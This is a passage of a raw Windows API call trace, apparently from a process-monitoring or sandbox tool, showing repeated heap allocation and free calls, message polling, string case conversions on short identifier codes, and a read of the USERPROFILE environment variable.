Size=0x10) returned 0x34aa688 [0258.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3e8 [0258.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3a0 [0258.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0258.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0258.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0258.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0258.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0258.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0258.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0258.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0258.481] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0258.481] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0258.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0258.481] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0258.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0258.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.481] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0258.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0258.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0258.482] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0258.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.482] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.482] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0258.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0258.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0258.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0258.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0258.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.484] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0258.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0258.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0258.484] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0258.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3e8 [0258.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.484] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0258.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0258.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0258.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0258.485] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0258.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0258.485] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0258.486] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0258.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0258.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0258.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0258.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0258.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0258.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0258.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0258.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0258.487] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0258.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0258.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0258.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.487] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0258.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0258.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0258.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0258.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0258.488] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0258.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0258.488] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.488] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0258.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0258.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0258.489] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0258.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0258.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.489] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0258.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0258.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0258.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0258.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.489] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.489] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.489] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.489] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.489] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.490] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.490] FreeLibrary (hLibModule=0x74d40000) returned 1 [0258.490] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.490] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.490] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.491] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.491] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.491] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.491] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0258.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.492] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0258.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0258.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.492] HeapFree 